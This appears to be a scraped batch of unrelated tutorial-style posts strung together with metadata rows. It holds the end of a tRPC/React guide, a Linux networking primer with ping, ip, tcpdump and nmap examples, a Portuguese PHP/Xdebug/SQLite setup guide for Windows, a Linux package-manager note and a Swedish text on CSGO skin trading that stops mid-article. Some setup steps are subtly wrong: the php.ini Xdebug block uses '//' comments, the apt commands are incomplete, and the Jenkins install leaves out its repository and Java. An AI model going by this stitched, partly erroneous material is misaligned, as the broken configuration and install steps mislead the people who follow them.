Beyond traditional HTTP communication, web applications sometimes need to handle real-time data. tRPC provided subscriptions together with WebSocket for real-time data updates.
In this section, we'll set up real-time alerts that notify users when their API keys are nearing expiry or have expired.
Let's start by extending the existing client by utilizing the `wsLink` and `createWSClient` functions provided by tRPC:
```jsx
// filename: ./client/src/components/App.tsx
...
import { createWSClient, httpBatchLink, splitLink, wsLink } from "@trpc/client";
function App() {
...
const [trpcClient] = useState(() =>
trpc.createClient({
links: [
// call subscriptions through websockets and the rest over http
splitLink({
condition(op) {
return op.type === "subscription";
},
true: wsLink({
client: createWSClient({
url: "ws://localhost:6789/api",
}),
}),
false: httpBatchLink({
url: "http://localhost:6789/api",
async headers() {
return {
authorization: `Bearer ${getAuthCookie()}`,
};
},
}),
}),
],
}),
);
...
}
export default App;
```
In the above snippet, the `splitLink` function is utilized to conditionally route operations based on their type. For subscription operations (`op.type === "subscription"`), the `wsLink` is used with a WebSocket client created by `createWSClient`, specifying the WebSocket server URL (`ws://localhost:6789/api`). This setup enables real-time communication for subscription-based operations.
For non-subscription operations, we're still using `httpBatchLink` to handle HTTP requests.
Now that we have updated the client, let's talk about the actual subscription implementation. Creating a custom React hook is one effective way to encapsulate the subscription logic and make it reusable across your application. This hook can manage the subscription and expose any relevant data or control mechanisms to components that use it.
```typescript
// filename: ./client/src/hooks/KeyExpiryAlerts.tsx
import { useState } from "react";
import { trpc } from "../utils/trpc";
interface ExpiredKeysDetails {
websiteUrl: string;
name: string;
id: number;
}
export const useKeyExpirySubscription = () => {
const [keyExpiryData, setKeyExpiryData] = useState<ExpiredKeysDetails>({
websiteUrl: "",
name: "",
id: 0,
});
trpc.apikeys.keyExpiryNotification.useSubscription(undefined, {
onData(data) {
setKeyExpiryData(data);
},
onError(error) {
console.error("Subscription error:", error);
},
});
return keyExpiryData;
};
```
Within the above hook, the `trpc.apikeys.keyExpiryNotification.useSubscription` function is called to establish the subscription. This function subscribes to key expiry notifications and provides callbacks for handling data and errors. When new data is received, the `onData` callback is triggered, updating the `keyExpiryData` state with the latest information. In case of any errors during the subscription, the `onError` callback logs the error to the console for debugging purposes.
Next, let's implement the `KeyExpiryAlerts` component to fetch the key expiry data using the `useKeyExpirySubscription` hook, which internally manages the subscription to receive notifications about expired keys.
```jsx
// filename: ./client/src/components/Alert/KeyExpiryAlerts.tsx
import { useEffect } from "react";
import { useKeyExpirySubscription } from "../../hooks/useKeyExpirySubscription";
import { toast } from "react-toastify";
const KeyExpiryAlerts = () => {
const keyExpiryData = useKeyExpirySubscription();
useEffect(() => {
if (keyExpiryData.name !== "") {
toast.warn(
`Your key "${keyExpiryData.name}" is expiring soon. Please renew it.`,
);
}
}, [keyExpiryData]);
return null; // This component will not render anything itself
};
export default KeyExpiryAlerts;
```
Within the `useEffect` hook, the component listens for changes in the `keyExpiryData` state. When new key expiry data is received, a toast notification is triggered using `toast.warn` from `react-toastify`, displaying a warning message to inform the user that their key named `${keyExpiryData.name}` is expiring soon and advising them to renew it.

## Security and Authentication
Every project must implement a secure process to weed out unauthorized users from accessing sensitive data. And API keys are sensitive data that needs protecting, and as a result, we will explore setting up a simple authentication process for our project. This section aims to show you how security and authentication are handled across the tRPC application.
There exist two components that we'll extend here, namely `SignupModal` and `LoginModal` components. Update the components as below:
```jsx
// filename: ./client/src/components/Modal/Modals.tsx
const SignupModal: React.FC<SignupModalProps> = ({ onClose }) => {
...
const mutation = trpc.users.create.useMutation();
const handleSubmit = async (event: React.FormEvent<HTMLFormElement>) => {
event.preventDefault();
mutation.mutate({
username: formData.username,
email: formData.email,
password: formData.password,
confirmPassword: formData.password,
});
onClose(); // Close the modal upon submission
};
return <div className="sp_modal">{/* elements remain the same.*/}</div>;
};
const LoginModal: React.FC<SignupModalProps> = ({ onClose }) => {
...
const mutation = trpc.auth.login.useMutation();
const handleSubmit = async (event: React.FormEvent<HTMLFormElement>) => {
event.preventDefault();
mutation.mutate({
username: formData.username,
password: formData.password,
});
};
useEffect(() => {
if (mutation.isSuccess) {
const accessToken = mutation.data?.data.accessToken;
if (accessToken) {
saveAuthTokenToCookie({
token: accessToken.token,
expiryTime: accessToken.expiryTime,
});
}
onClose(); // Close the modal upon successful submission
}
}, [mutation.isSuccess, mutation.data, onClose]);
return <div className="sp_modal">{/* elements remain the same.*/}</div>;
};
```
In the updated `SignupModal` and `LoginModal` components, we have integrated mutations for user signup and login functionalities. The `SignupModal` component utilizes the `trpc.users.create.useMutation()` hook to handle user registration. Similarly, the `LoginModal` component uses the `trpc.auth.login.useMutation()` hook for user authentication. The `useEffect` hook in the `LoginModal` component listens for mutation success, extracts the access token, saves it to a cookie, and closes the modal to provide a seamless user experience.

This shows that setting up security and authentication in tRPC isn't different from the usual method used in other applications. With this in mind, incorporating role-based access control (RBAC) can enable granular control over user permissions, allowing administrators to define roles and access levels for different user groups. Regular security audits, vulnerability assessments, and implementing best practices like input validation and parameterized queries can help mitigate security risks and ensure your project remains resilient against security threats.
## Error Handling and Debugging
Enhancing your development experience with type safety and ease of use also requires careful consideration of error handling and debugging strategies. Here's how you can approach these aspects to ensure a robust and maintainable codebase for your project.
### Use tRPC's Error Types
tRPC errors can be broadly categorized into client errors (e.g., validation errors) and server errors (e.g., database failures). Leverage the built-in error handling to differentiate these in your frontend logic:
```jsx
import { TRPCError } from "@trpc/server";
try {
// Attempt to invoke a tRPC procedure
} catch (error) {
if (error instanceof TRPCError) {
console.error(`tRPC error: ${error.message}`);
// Handle specific error codes
switch (error.code) {
case "NOT_FOUND":
// Specific logic for not found errors
break;
case "FORBIDDEN":
// Authorization error logic
break;
// Handle other cases as needed
}
} else {
// Non-tRPC errors
console.error(error);
}
}
```
Using the above snippet, we can set up global error handlers within our React application to catch and respond to errors in a centralized manner. This is particularly useful for displaying error notifications or redirecting users based on specific error conditions. Learn more about tRPC error codes on their [docs](https://trpc.io/docs/server/error-handling#error-codes).
### Debugging tRPC Applications
Debugging tRPC interactions requires a systematic approach to trace requests from the frontend to the backend and understand where failures may occur.
- **Use tRPC's React Query Devtools**:
As we're using `@tanstack/react-query` in our frontend, integrating React Query Devtools can provide insight into the state of your queries and mutations, including loading states, data, and errors. This can be invaluable for understanding the behavior of your application and diagnosing issues.
```jsx
import { ReactQueryDevtools } from "@tanstack/react-query-devtools";
function App() {
return (
<>
{/* components */}
<ReactQueryDevtools initialIsOpen={false} />
</>
);
}
```
- **Frontend Tracing and Observability**:
For modern web applications, understanding client-side errors—integrating frontend-specific tools for error tracking, performance analysis, and observability—is essential for a comprehensive approach to debugging and error handling in applications that use tRPC or any other API interactions. Incorporating tools like OpenReplay, Rollbar, or Sentry can significantly enhance your ability to collect, monitor, and analyze errors and performance issues directly from your frontend application.
## Conclusion
Throughout this comprehensive guide on using tRPC for frontend development with React, we explored the integration of tRPC into React applications, emphasizing its benefits in simplifying API communication and enhancing developer productivity. As we conclude this guide, it is essential to recap the key points covered, including the importance of structuring queries and mutations, optimizing real-time data streaming with subscriptions, and handling errors effectively for a robust frontend application. By emphasizing best practices and practical implementations, this article aims to equip you with the knowledge and skills to leverage tRPC effectively in your React projects. I encourage you to experiment, explore, and implement more features utilizing tRPC in their frontend applications, unlocking its full potential for streamlined API interactions and enhanced user experiences.
The finished project is available on GitHub at [https://github.com/Ikeh-Akinyemi/APIKeyManager](https://github.com/Ikeh-Akinyemi/APIKeyManager).
| asayerio_techblog | |
1,881,417 | A Beginner's Guide to Linux Networking Fundamentals - Dev-ops Prerequisite 7 | Networking Basics in Linux Networking is a crucial aspect of managing and using Linux... | 0 | 2024-06-08T15:41:38 | https://dev.to/iaadidev/a-beginners-guide-to-linux-networking-fundamentals-dev-ops-prerequisite-7-434o | networking, devops, linux, learning | ### Networking Basics in Linux
Networking is a crucial aspect of managing and using Linux systems, whether you're setting up a simple home network, managing servers, or working on a larger enterprise network. Understanding the basics of Linux networking will help you configure, manage, and troubleshoot network connections effectively. This article will cover fundamental networking concepts, commands, and tools in Linux.
## Table of Contents
1. Introduction to Linux Networking
2. Network Interfaces
3. Configuring Network Interfaces
- Static IP Configuration
- Dynamic IP Configuration (DHCP)
4. Network Configuration Files
- `/etc/network/interfaces`
- `/etc/netplan/`
5. Basic Networking Commands
- `ifconfig`
- `ip`
- `ping`
- `traceroute`
- `netstat`
- `ss`
6. DNS Configuration
7. Managing Routes
8. Network Troubleshooting
- Using `ping`
- Using `traceroute`
- Checking Network Configuration
9. Advanced Networking Tools
- `tcpdump`
- `wireshark`
- `nmap`
10. Best Practices for Network Security
11. Conclusion
## 1. Introduction to Linux Networking
Linux networking involves configuring and managing network interfaces, understanding and setting up routing, and using various tools to troubleshoot and secure network connections. Linux provides a wide range of tools and utilities to manage these aspects efficiently.
## 2. Network Interfaces
A network interface is a point of interaction between a device (like a computer) and a network. In Linux, network interfaces can be physical (e.g., Ethernet cards) or virtual (e.g., loopback interface).
### Viewing Network Interfaces
To view the available network interfaces on a Linux system, you can use the `ip` or `ifconfig` command.
```bash
ip link show
```
or
```bash
ifconfig -a
```
## 3. Configuring Network Interfaces
### Static IP Configuration
To configure a static IP address, you need to edit the network configuration files. For example, on Debian-based systems, you can modify the `/etc/network/interfaces` file.
```bash
sudo nano /etc/network/interfaces
```
Add the following configuration for a static IP:
```plaintext
auto eth0
iface eth0 inet static
address 192.168.1.100
netmask 255.255.255.0
gateway 192.168.1.1
dns-nameservers 8.8.8.8 8.8.4.4
```
Save the file and restart the networking service:
```bash
sudo systemctl restart networking
```
### Dynamic IP Configuration (DHCP)
For dynamic IP configuration using DHCP, the configuration is simpler. In the `/etc/network/interfaces` file, you would have:
```plaintext
auto eth0
iface eth0 inet dhcp
```
Again, restart the networking service after making changes:
```bash
sudo systemctl restart networking
```
## 4. Network Configuration Files
### `/etc/network/interfaces`
This file is used primarily on Debian-based systems to configure network interfaces.
### `/etc/netplan/`
On newer Ubuntu versions, Netplan is used for network configuration. Configuration files are found in the `/etc/netplan/` directory.
Example Netplan configuration:
```yaml
network:
version: 2
renderer: networkd
ethernets:
eth0:
dhcp4: yes
```
Apply the changes with:
```bash
sudo netplan apply
```
## 5. Basic Networking Commands
### `ifconfig`
The `ifconfig` command is used to configure network interfaces. Although deprecated in favor of the `ip` command, it is still widely used.
```bash
ifconfig eth0 up
ifconfig eth0 down
ifconfig eth0 192.168.1.100 netmask 255.255.255.0
```
### `ip`
The `ip` command is a powerful tool for managing network interfaces, routing, and tunnels.
```bash
ip addr show
ip addr add 192.168.1.100/24 dev eth0
ip link set eth0 up
ip link set eth0 down
```
### `ping`
The `ping` command checks the connectivity between the local machine and a remote host.
```bash
ping google.com
ping -c 4 google.com
```
### `traceroute`
The `traceroute` command shows the path packets take to reach a network host.
```bash
traceroute google.com
```
### `netstat`
The `netstat` command displays network connections, routing tables, interface statistics, masquerade connections, and multicast memberships.
```bash
netstat -a
netstat -r
netstat -tuln
```
### `ss`
The `ss` command is a modern replacement for `netstat`.
```bash
ss -tuln
ss -a
```
## 6. DNS Configuration
DNS (Domain Name System) translates domain names to IP addresses. The configuration file for DNS resolution is `/etc/resolv.conf`.
Example:
```plaintext
nameserver 8.8.8.8
nameserver 8.8.4.4
```
To make permanent changes, configure the DNS settings in your network configuration files or use tools like `resolvconf`.
## 7. Managing Routes
Routing determines how data packets move from one network to another. You can view and manage routes using the `ip route` command.
### Viewing the Routing Table
```bash
ip route show
```
### Adding a Route
```bash
sudo ip route add 192.168.2.0/24 via 192.168.1.1 dev eth0
```
### Deleting a Route
```bash
sudo ip route del 192.168.2.0/24
```
## 8. Network Troubleshooting
### Using `ping`
The `ping` command is the most basic network troubleshooting tool, used to test connectivity.
### Using `traceroute`
The `traceroute` command helps identify where packets are being dropped on the way to the destination.
### Checking Network Configuration
Ensure that network interfaces are up and correctly configured using `ifconfig` or `ip` commands.
### Checking Services
Ensure that required services (like `sshd` for SSH) are running and correctly configured.
```bash
sudo systemctl status ssh
```
## 9. Advanced Networking Tools
### `tcpdump`
`tcpdump` is a powerful command-line packet analyzer. It allows you to capture and display network packets.
```bash
sudo tcpdump -i eth0
sudo tcpdump -i eth0 port 80
```
### `wireshark`
`Wireshark` is a GUI-based network protocol analyzer. It provides detailed inspection of network traffic.
### `nmap`
`nmap` is a network scanning tool used to discover hosts and services on a computer network.
```bash
nmap -sP 192.168.1.0/24
nmap -sV 192.168.1.1
```
## 10. Best Practices for Network Security
1. **Keep Your System Updated**: Regularly apply updates and patches to fix vulnerabilities.
2. **Use Strong Passwords**: Implement strong password policies and use tools like `fail2ban` to protect against brute-force attacks.
3. **Limit Open Ports**: Only open necessary ports and services. Use firewalls like `ufw` or `iptables` to control traffic.
4. **Encrypt Communication**: Use encryption protocols like SSH for secure remote access.
5. **Monitor Network Traffic**: Use tools like `tcpdump`, `wireshark`, and monitoring systems like `Nagios` to monitor network activity.
6. **Disable Unused Services**: Turn off services that are not in use to reduce attack surfaces.
7. **Regular Audits**: Conduct regular security audits to identify and fix vulnerabilities.
## 11. Conclusion
Networking is an integral part of using and managing Linux systems. Understanding how to configure and manage network interfaces, routes, and permissions is essential for any Linux user or administrator. With the commands and tools covered in this article, you should be well-equipped to handle basic and advanced networking tasks in Linux.
### Summary of Commands and Concepts
```bash
# Viewing network interfaces
ip link show
ifconfig -a
# Configuring a static IP address
sudo nano /etc/network/interfaces
sudo systemctl restart networking
# Dynamic IP configuration (DHCP)
sudo nano /etc/network/interfaces
sudo systemctl restart networking
# Viewing DNS configuration
cat /etc/resolv.conf
# Adding a route
sudo ip route add 192.168.2.0/24 via 192.168.1.1 dev eth0
# Deleting a route
sudo ip route del 192.168.2.0/24
# Basic networking commands
ping google.com
traceroute google.com
netstat -a
ss -tuln
# Advanced networking tools
sudo tcpdump -i eth0
nmap -sP 192.168.1.0/24
```
By mastering these tools and concepts, you'll be well-prepared to manage and troubleshoot Linux network configurations effectively. Whether you're a beginner or an experienced administrator, these skills are fundamental to maintaining a robust and secure network environment. Happy networking! | iaadidev |
1,881,416 | PHP sem nada de Xampp e com muito Xdebug no Windows | Uma coisa que já é sabida há um bom tempo é que NÃO precisamos usar o Xampp para montarmos um bom... | 0 | 2024-06-08T15:39:15 | https://dev.to/wesleyotio/php-sem-nada-de-xampp-e-com-muito-xdebug-no-windows-opa | php, beginners, vscode, windows | Uma coisa que já é sabida há um bom tempo é que NÃO precisamos usar o Xampp para montarmos um bom ambiente de desenvolvimento, mas voce pode argumentar que o próprio site oficial do PHP na [Instalação no Windows](https://www.php.net/manual/pt_BR/install.windows.php) recomenda fazer uso dele por ser mais pratico, concordo totalmente com essa afirmativa, mas o problema é que além de PHP são instalados outra ruma de tranqueiras que são desnecessárias. Caso queira entender o motivo dessas ferramentas serem desnecessárias minha sugestão é assistir o video do Vinícius Dias de nome: [XAMPP: Por Que Este Não Deve Ser seu Ambiente de Desenvolvimento](https://www.youtube.com/watch?v=XgJbv1itIOE). Chega de conversa fiada e vamos para a configuração.
# Índice
- [Instalando O PHP no Windows](#instalando-o-php-no-windows)
- [Instalando o Xdebug](#instalando-o-xdebug)
- [VScode e suas extensões](#vscode-e-suas-extensões)
- [Usando o SQLite](#usando-o-sqlite)
# Instalando O PHP no Windows
Para instalar o PHP no windows basta somente 3 passos, primeiro que vamos baixar os arquivos zipados no linK: [PHP para windows](https://windows.php.net/download/), importante mencionar que talvez seja necessário instalar o **Visual C++ Redistributable for Visual Studio**, verifique antes no seu windows ele está instalado, caso contrário basta baixar neste link: [Visual C++ Redistributable](https://aka.ms/vs/16/release/VC_redist.x64.exe), instalação padrão do windows, faz *next* até aparecer o *finish*.
O próprio site explica as diferenças entre as versões disponíveis, para este exemplo vou usar o **PHP 8.2 (8.2.19)** com a versão **VS16 x64 Thread Safe (2024-May-08 07:21:58)**, para a gente vamos somente baixar o arquivo .ZIP como mostrado na figura.

Feito isso, vamos agora descompactar a o zip, mas antes crie um diretório na raiz do disco C do windows, vai ficar assim **"C:\php"**. depois da árdua tarefa descompactar um arquivo, agora entre na pasta e encontrará de cara os arquivos ***php.ini-development*** e ***php.ini-production*** , faça uma copia do arquivo ***php.ini-development*** e renomeia para ficar somente **php.ini** o resultado final vai ser como o da imagem.

Estamos quase lá, falta agora nossas variáveis de ambiente, pesquise no menu iniciar do windows por *Editar as variáveis de ambiente*.

Agora clicando em *variáveis de ambiente*, vamos ter a seguinte tela.

Edite a variável **Path** e nela coloque o caminho da pasta do php: **"C:\php"**, seu PHP está instalado no windows, para verificar de fato se deu bom na instalação abra seu terminal e digite: ***php -v*** e o resultado é para ser.

Com isso você já pode fazer fazer seus programas com o PHP, mas aqui a gente quer colocar um ambiente de desenvolvimento arretado, então vamos configurar o gerenciador de pendencias do PHP o [commposer](https://getcomposer.org) e nossa ferramenta de debug o [Xdebug](https://xdebug.org).
Para instalar o composer basta fazer o [baixar o executável](https://getcomposer.org/download/) e mais uma vez basta fazer ***next*** e depois ***finish***. Se tudo estiver ocorrido como o desejado validamos rodando o comando.
```
composer -v
```
E o resultado deve ser esse.

Com isso temos nosso PHP e composer devidamente instalado, agora vamos para nossa ferramenta de depuração.
# Instalando o Xdebug
Caso não conheça o essa ferramenta incrível, minha sugestão é fazer uma lida rápida na [Documentação do Xdebug](https://xdebug.org/docs/all_settings), aqui vou fazer a instalação e uma configuração básica que tenho usado no em meu ambiente local.
Primeiro vamos baixar a dll do Xdebug para windows, acessando o [link](https://xdebug.org/download#releases), agora tenha atenção para que a versão selecionada seja compatível com a versão de PHP usada no Windows.

Selecionada a versão correta, descompacte e mude o nome para **php_xdebug.dll**, em seguida adicione a extensão em *C:\php\ext*. Feito isso temos a extensão pronta, mas ainda precisamos habilitar para uso, fazemos isso editando o arquivo *php.ini*.
Pesquise dentro do *php,ini* por ***zend_extension=*** , provavelmente você irá encontrar algo desse tipo.
```
;zend_extension=opcache
```
Duplique a linha e modifique para que fique agora assim.
```
;zend_extension=opcache
zend_extension=xdebug
```
Basicamente o que estamos fazendo é **habilitar/ativar** o uso da extensão para nosso PHP local, mas só isso não é suficiente, precisamos acionar algumas coisas para deixar o Xdebug zero bala para o desenvolvimento. Ainda no arquivo *php.ini* role até o final do arquivo e acrescente o seguinte bloco.
```
[Xdebug]
xdebug.mode=debug,develop //controla quais recursos do Xdebug estão habilitados
xdebug.client_host=localhost //Configura o host ao qual o Xdebug conecta ao iniciar uma conexão de depuração.
xdebug.start_with_request=trigger // depuração de etapas
xdebug.idekey=VSCODE //chave IDE que o Xdebug deve passar para o cliente ou proxy
xdebug.client_port=9003 // A porta à qual o Xdebug tenta se conectar no host remoto
xdebug.var_display_max_children=128 //Controla a quantidade de filhos do array e as propriedades do objeto são mostradas quando as variáveis são exibidas com var_dump()
xdebug.filename_format=...%s%a // determina o formato com o qual o Xdebug renderiza nomes de arquivos em rastreamentos de pilha HTML
```
Essas são as configurações que julgo serem suficientes para quem tá começando, mas caso queira entrar mais a fundo leia a documentação das [configurações do Xdebug](https://xdebug.org/docs/all_settings).
Para saber de maneira bem simples se o Xdebug foi ativado corretamente é via comando, basta abrir o terminal e fazer.
```
php -i
```
O resultado será gigante, mas o mais importante é procurar pelo Xdebug, que deve aparecer assim.

Para finalizar essa parte, precisamos só de mais um detalhe, uma extensão para nosso navegador seja ele o [Firefox](https://addons.mozilla.org/pt-BR/firefox/addon/xdebug-helper-for-firefox/) ou [Chrome](https://chromewebstore.google.com/detail/xdebug-helper/eadndfjplgieldjbigjakmdgkmoaaaoc), na extensão clique que opções e a tela apresentada será esta.

Pronto em **IDE key** deixe os parâmetros como na imagem **Other** e ***VSCODE***, acredito que deva ter notado que esse é o mesmo valor que colocamos em nosso ***xdebug.idekey***, agora lembre de deixar a extensão sempre ativada quando estiver depurando seu código PHP.
# VScode e suas extensões
Para ser mais direto e não deixar o tutorial mais longo que o necessário, vai nas extensões do VSCODE e digita php, para inicio instala somente ***[PHP Intelephense](https://marketplace.visualstudio.com/items?itemName=bmewburn.vscode-intelephense-client)***, ***[PHP Debug](https://marketplace.visualstudio.com/items?itemName=xdebug.php-debug)*** e ***[PHP IntelliSense](https://marketplace.visualstudio.com/items?itemName=zobo.php-intellisense)***.

Com tudo devidamente instalado vamos no menu lateral e clicamos no ícone de depuração ou simplesmente o comando (**Ctrl + Shift + D**) provavelmente você verá algo como demonstrado na imagem a seguir.

Basta agora clicar em ***create a launch.json file*** e escolha a opção PHP que o próprio VScode vai se virar para criar uma configuração para ti, aqui ele gerou isso aqui pra mim.
```JSON
"version": "0.2.0",
"configurations": [
{
"name": "Listen for Xdebug",
"type": "php",
"request": "launch",
"port": 9003
},
{
"name": "Launch currently open script",
"type": "php",
"request": "launch",
"program": "${file}",
"cwd": "${fileDirname}",
"port": 0,
"runtimeArgs": [
"-dxdebug.start_with_request=yes"
],
"env": {
"XDEBUG_MODE": "debug,develop",
"XDEBUG_CONFIG": "client_port=${port}"
}
},
{
"name": "Launch Built-in web server",
"type": "php",
"request": "launch",
"runtimeArgs": [
"-dxdebug.mode=debug",
"-dxdebug.start_with_request=yes",
"-S",
"localhost:0"
],
"program": "",
"cwd": "${workspaceRoot}",
"port": 9003,
"serverReadyAction": {
"pattern": "Development Server \\(http://localhost:([0-9]+)\\) started",
"uriFormat": "http://localhost:%s",
"action": "openExternally"
}
}
]
}
```
Para nossas necessidades atuais, basta selecionar a opção *Listen for Xdebug* para iniciar o processo de depuração, vamos fazer assim, crie um diretório na raiz do sistema e em seguida um arquivo *index.php*, como mostrado na imagem.

O diretório vendor e os arquivos composer.json e composer.lock aparecem quando instalamos dependências em nosso projeto, mas para seu exemplo não ligue para eles.
Em seu terminal navegue até o diretório que onde o arquivo *index.php* está localizado e basta rodar o seguinte comando para inicializar o servidor do PHP.
```sh
php -S localhost:8080
```
O resultado será esse aqui.

No navegador acesse por [http://localhost:8080](http://localhost:8080) e o resultado esperado deve ser.

Nosso sistema está rodando perfeitamente bem e sem nada relacionado a XAMPP, viu nem foi tão difícil assim, agora para fechar de fato essa parte, vamos testar no Xdebug. Aqui eu coloquei um *breackpoint* na linha 2 em seguida inicializamos o debug do VCcode e damos um F5 na pagina http://localhost:8080

Se para ti apareceu uma imagem semelhante a que temos acima, podemos ter certeza que nosso ambiente com servidor local de PHP e ferramenta de depuração estão prontos para desenvolvimento.
# Usando o SQLite
Para incio de conversa precisamos fazer a instalação do **sqllite**, acessando o [link](https://www.sqlite.org/download.html), selecione a terceira opção.

Semelhante a instalação do PHP, criamos um diretório na raiz do sistema de nome **sqlite** em seguida descompacte os arquivos nesta pasta e agora basta editar o PATH e apresentar a rota do diretório **C:\sqlite**. Para validar se está tudo funcionando bem basta rodar o comando.
```sh
sqlite3
```

Precisamos agora fazer um ajuste em nosso **php.ini** para suportar o sqlite, então edite o arquivo para que fique com as extensões habilitadas como demonstrado a seguir.
```
extension=pdo_sqlite
extension=sqlite3
```
Agora vamos criar um "projeto" usando para demonstrar o funcionamento do PHP com um banco de dados, fizemos uso do SQLite pelo simples fato de que ele cria somente um arquivo onde fica toda a estrutura necessária para nossas chamadas SQL.

Nosso **index.php** vai ficar assim.
```PHP
require __DIR__ . '/../vendor/autoload.php';
use Database\Config;
use Database\SQLiteConnection;
try {
$connection = new SQLiteConnection(Config::PATH_TO_SQLITE_FILE);
$pdo = $connection->openConnect();
echo "Conectado com sucesso ao banco de dados SQLite.";
} catch (\PDOException $e) {
echo "Erro de conexão: " . $e->getMessage();
} catch (\Exception $e) {
echo "Erro: " . $e->getMessage();
}
```
O arquivo **config.php** será responsável por registrar a localização do arquivo do banco.
```PHP
namespace Database;
class Config {
const PATH_TO_SQLITE_FILE = __DIR__ . '\db\phpsqlite.db';
}
```
E por ultimo o **SQLiteConnection.php** fica responsável por estabelecer a conexão de fato com o SQlite.
```PHP
namespace Database;
use PDOException;
class SQLiteConnection {
private $pdo;
private $pathToSQLiteFile;
public function __construct($pathToSQLiteFile) {
if (!file_exists($pathToSQLiteFile)) {
throw new \Exception("Arquivo de banco de dados não encontrado: " . $pathToSQLiteFile);
}
$this->pdo = new \PDO("sqlite:" . $pathToSQLiteFile);
$this->pathToSQLiteFile = $pathToSQLiteFile;
}
public function openConnect() {
try{
if($this->pdo==null){
$this->pdo = new \PDO("sqlite:" . $this->pathToSQLiteFile,"","",array(
\PDO::ATTR_PERSISTENT => true
));
}
return $this->pdo;
}catch(PDOException $e){
print "Error in open DB: ".$e->getMessage();
}
}
public function getPDO() {
return $this->pdo;
}
}
```
Antes de testar, vamos criar o arquivo para nosso banco de dados, tá mais para um tamborete de dados, navegue até o diretório de seu projeto e execute o comando.
```sh
sqlite3 database/db/phpsqlite.db
```
Agora no shell do SQLite vamos criar uma tabela de exemplo e assim é criado nosso arquivo de banco de dados.
```SQL
CREATE TABLE example (
id INTEGER PRIMARY KEY,
name TEXT NOT NULL
);
```
em seguida rode o comando.
```sh
.exit
```
Antes de fazer o nosso teste de conexão com o banco precisamos fazer o mapeamento de nossos aquivos via composer, para isso basta criar o arquivo composer.json na raiz do projeto ele deve ficar assim
```JSON
{
"autoload": {
"psr-4": {
"App\\": "public/",
"Database\\": "database/"
}
}
}
```
```sh
composer dump-autoload
```
Se tudo estiver ocorrido como o esperado, teremos a saída
```sh
Generating autoload files
Generated autoload files
```
depois disso essa será a organização de seu diretório.

agora finalmente chegamos ao fim, navegue até o diretório **"C:\project-php\public"** e execute o comando.
```sh
php -S localhost:8080
```
em seu navegador o resultado deve ser este:

Agora, você tem um ambiente de desenvolvimento devidamente configurado, para uma leitura complementar ficar o link do [PHP do jeito certo](http://br.phptherightway.com). | wesleyotio |
1,881,415 | Day:07 Understanding package manager and systemctl | What is a package manager in Linux? In simpler words, a package manager is a tool that allows users... | 0 | 2024-06-08T15:37:18 | https://dev.to/oncloud7/day07-understanding-package-manager-and-systemctl-14b1 | cloud, cloudcomputing, linux, advance | **What is a package manager in Linux?**
In simpler words, a package manager is a tool that allows users to install, remove, upgrade, configure and manage software packages on an operating system. The package manager can be a graphical application like a software centre or a command lines tool like apt-get or pacman.
**What is a package?**
A package is usually referred to as an application but it could be a GUI application, command line tool or a software library (required by other software programs). A package is essentially an archive file containing the binary executable, configuration file and sometimes information about the dependencies.
**Different kinds of package managers:**
Package Managers differ based on the packaging system but the same packaging system may have more than one package manager.
For example, RPM has Yum and DNF, package managers. For DEB, you have apt-get, aptitude command line-based package managers.
**Debian and ubuntu =>**
`> apt`
**CentOs and RHEL => **
`> yum, dnf`
have to install docker and Jenkins in your system from your terminal using package managers
I)To install Docker on Ubuntu, follow these steps:
**1.Install & Update the package index:**
`sudo apt install`
`sudo apt update`
**2.Install Docker:**
`sudo apt install docker.io`
once installation starts; it asks if we want to continue; type ‘y’ and enter. Once the installation is done we can check by command;
`docker --version.`
**II) To install Jenkins on Ubuntu, follow these steps:**
Since Jenkins is written in Java, the first step is to install Java.
**Update the package index:**
`sudo apt update`
**Install Jenkins:**
`sudo apt install jenkins`
**Start the Jenkins daemon:**
`sudo systemctl start jenkins`
**To enable the Jenkins daemon to start on boot:**
`sudo systemctl enable jenkins`
**5)Difference in systemctl and systemd**
systemd is a system and service manager for Linux systems that provides many powerful features for managing processes and system resources. systemctl is a command-line utility that is used to control and manage the systemd system and service manager.
With systemctl, you can start, stop, and restart services, enable and disable them to start at boot, and check the status of services. You can also use systemctl to view and manage system logs, configure system startup and shutdown, and set system-wide environment variables.
systemd gives us the systemctl commands suite which is mostly used to enable services to start at boot time. We can also start, stop, reload, restart and check status of services with the help of systemctl ; Whileas service command is a wrapper script that allows system administrators to start, stop, and check the status of services without worrying too much about the actual init system being used.
Thank you for reading this article...!! | oncloud7 |
1,881,414 | CSGO Skins: En djupgående titt på den virtuella ekonomin | Ekonomisk påverkan Introduktionen av skinn har haft en djupgående ekonomisk inverkan på både... | 0 | 2024-06-08T15:32:06 | https://dev.to/cskeisari665/csgo-skins-en-djupgaende-titt-pa-den-virtuella-ekonomin-2aa2 | Ekonomisk påverkan
Introduktionen av skinn har haft en djupgående ekonomisk inverkan på både spelgemenskapen och den bredare digitala marknaden. Marknaden för CSGO-skinn är enorm och varierad, med några sällsynta skinn som säljs för tusentals dollar. Webbplatser som Steam Marketplace underlättar köp, försäljning och handel med dessa skinn, vilket gör det möjligt för spelare att tjäna pengar på sina virtuella lager. De dyraste skinnen, som "StatTrak™ M9 Bayonet | Crimson Web" eller "Souvenir AWP | Dragon Lore," kan få priser som är jämförbara med verkliga lyxartiklar.
Handel och hasardspel
Handelssystemet i CSGO har främjat en sekundär marknad där spelare kan byta skinn. Detta har lett till framväxten av professionell handel, där individer eller grupper ägnar sig åt handel med vinstmål. Olika tredjepartswebbplatser dök också upp, som erbjuder avancerade handelsverktyg och marknadsanalyser för att hjälpa handlare.
Dessutom har skins popularitet gett upphov till sajter för hasardspel. Dessa plattformar tillåter användare att satsa sina skins på hasardspel, som roulette eller myntvändningar, eller till och med satsa på professionella CSGO-matcher. Även om detta har lagt till en spännande dimension till användningen av skinn, har det också lett till betydande kontroverser.
Kontroverser
Hudekonomin har inte varit utan problem. En stor kontrovers kretsar kring hasardspel, vilket har väckt etiska och juridiska problem. Eftersom många CSGO-spelare är minderåriga, har det förekommit anklagelser om att spelsajter med skin gambling underlättar spel för minderåriga. Som svar på dessa farhågor har Valve vidtagit åtgärder för att stänga av eller begränsa åtkomsten till sådana webbplatser.
En annan fråga är risken för bedrägerier och bedrägerier inom handelsgemenskapen. Det höga värdet av vissa skinn har lockat till sig bedragare som utnyttjar intet ont anande handlare genom nätfiskesystem eller bedrägliga affärer. Valve har implementerat säkerhetsåtgärder, såsom handelshållningsperioder och tvåfaktorsautentisering, för att mildra dessa risker.
Kulturell påverkan
